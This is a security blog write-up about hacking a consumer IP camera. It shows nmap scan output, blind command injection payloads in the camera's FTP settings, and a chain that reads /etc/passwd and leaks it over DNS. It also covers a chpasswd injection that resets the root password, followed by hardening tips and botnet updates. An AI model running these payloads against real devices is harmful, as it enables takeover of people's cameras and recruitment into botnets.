The obvious problems
PORT STATE SERVICE VERSION
23/tcp open telnet BusyBox telnetd
81/tcp open http GoAhead-Webs httpd
| HTTP/1.1 401 Unauthorized
|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open tcpwrapped
The double blind command injection
or cleaned up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
Following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name
$(cat /tmp/a|head -1>/tmp/b) ;filter for the first row
$(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
$(ping `cat /tmp/c`) ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device … Neither netcat, bash …
But after spending way too much time without progress, I finally found the password to Open Sesame.
Now, logging in via telnet
(none) login: root
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
Woot woot 🙂 I quickly noticed the root of the command injection problem:
# cat /tmp/ftpupdate.sh
open ftp.site.com 21
user ftpuser $(echo 'root:passwd'|chpasswd)
put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
My hardening list
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
You can use OpenVPN to connect into your home network, and access the web interface of the camera. It works from Android, iOS, and any desktop OS.
My TODO list
- Investigate the script /system/system/bin/gmail_thread
- Investigate the cloud protocol * – see update 2016 10 27
- Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8
Slides (29 – ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: “Because of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE),
which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability. “https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above) and my command injection exploit was combined in the Persirai botnet. 120 000 cameras is expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper “The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously.”
This issue might be worse than the Mirai worm, because this effects cameras and other IoT behind NAT where UPNP was enabled.
This is a Security Bloggers Network syndicated blog post authored by Z. Read the original post at: Jump ESP, jump!